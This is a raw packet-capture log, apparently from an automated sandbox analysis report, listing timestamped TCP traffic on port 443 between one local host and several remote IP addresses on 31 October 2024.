                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.428129911 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.428179026 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.428303957 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.428400040 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.429440975 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.429487944 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.429536104 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.429552078 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.429596901 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.433537960 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.433638096 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.442254066 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.442370892 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.442420959 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.442459106 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.451107025 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.451159954 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.460011005 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.468791008 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.468817949 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.468859911 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.468863964 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.468873978 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.468914032 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.477860928 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.477958918 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.477972984 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.536354065 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.536376953 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.547168016 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.547194958 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.547234058 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.547249079 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.547307968 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.547349930 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.547413111 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.547564030 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.547574997 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.547954082 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.548086882 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.548098087 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.548505068 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.548572063 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.548582077 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.549673080 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.549712896 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.549750090 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.549765110 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.549879074 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.550776958 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.553040028 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.553071022 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.553082943 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.553102970 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.553222895 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.558315039 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.561342001 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.561407089 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.561422110 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.564446926 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.564497948 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.564512968 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.570024967 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.570086956 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.570101023 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.574385881 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.574429035 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.574459076 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.580279112 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.580321074 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.580333948 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.584948063 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.585009098 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.585021973 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.590612888 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.590676069 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.590688944 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.595654964 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.595702887 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.595717907 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.601416111 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.601787090 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.601803064 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.606344938 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.606426954 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.606440067 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.649471998 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.649504900 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.649548054 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.649563074 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.649626970 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.666213989 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.666275024 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.666364908 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.666385889 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.666419029 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.666474104 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.666482925 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.666584969 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.666613102 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.666626930 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.666645050 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.666676998 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.666776896 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.666838884 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.666866064 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.667018890 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.667026997 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.667098045 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.667699099 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.667753935 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.667860031 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.667876005 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.668045044 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.668073893 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.668133020 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.668149948 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.668220997 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.668227911 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.669172049 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.669260025 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.669266939 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.673187017 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.673280954 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.673295021 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.678467989 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.678536892 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.678565025 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.681058884 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.681117058 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.681134939 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.684273005 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.684828043 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.684839010 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.688195944 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.690304041 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.690347910 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.690359116 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.690378904 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.690530062 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.693260908 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.693937063 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.693945885 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.696981907 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.697112083 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.697129011 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.698714018 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.698750973 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.698765039 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.701843023 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.701920033 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.701930046 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.704698086 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.704798937 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.704806089 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.707633972 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.707705975 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.707715988 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.710148096 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.710232019 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.710253954 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.713115931 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.713156939 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.713165998 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.713188887 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.713227034 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.717113018 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.719850063 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.719890118 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.719929934 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.719943047 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.720016003 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.721497059 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.725214958 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.725234032 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.725308895 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.725323915 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.725411892 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.726383924 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.728605032 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.728631020 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.728677988 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.728688955 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.728925943 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.731234074 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.733617067 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.733640909 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.733685970 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.733696938 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.733887911 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.736514091 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.739370108 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.739432096 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.739494085 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.739505053 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.739650965 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.741688967 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.743695021 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.743741035 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.743801117 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.743810892 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.743850946 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.745887995 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.748670101 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.748730898 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.748742104 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.769308090 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.769337893 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.769362926 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.769385099 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.769478083 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.769678116 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.769726992 CET44349835142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.769835949 CET49835443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.849091053 CET44349838142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.865087032 CET4434985634.160.236.64192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.891379118 CET49838443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.891405106 CET44349838142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.891710997 CET49856443192.168.2.434.160.236.64
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.891726971 CET4434985634.160.236.64192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.891968966 CET44349838142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.892507076 CET4434985634.160.236.64192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.892569065 CET49856443192.168.2.434.160.236.64
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.894176960 CET4434985634.160.236.64192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.894270897 CET49856443192.168.2.434.160.236.64
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.896194935 CET49838443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.896322012 CET44349838142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.899053097 CET49856443192.168.2.434.160.236.64
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.899146080 CET4434985634.160.236.64192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.899485111 CET49838443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.899653912 CET49856443192.168.2.434.160.236.64
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.899663925 CET4434985634.160.236.64192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.947371006 CET44349838142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.972701073 CET44349839172.217.18.4192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.037296057 CET49856443192.168.2.434.160.236.64
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.037321091 CET49839443192.168.2.4172.217.18.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.039645910 CET49839443192.168.2.4172.217.18.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.039654970 CET44349839172.217.18.4192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.043271065 CET44349839172.217.18.4192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.043303967 CET44349839172.217.18.4192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.043344021 CET49839443192.168.2.4172.217.18.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.045515060 CET49839443192.168.2.4172.217.18.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.045691967 CET44349839172.217.18.4192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.050842047 CET443498708.2.111.136192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.054965973 CET49839443192.168.2.4172.217.18.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.054980993 CET44349839172.217.18.4192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.056092978 CET49870443192.168.2.48.2.111.136
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.056101084 CET443498708.2.111.136192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.057199001 CET443498708.2.111.136192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.057252884 CET49870443192.168.2.48.2.111.136
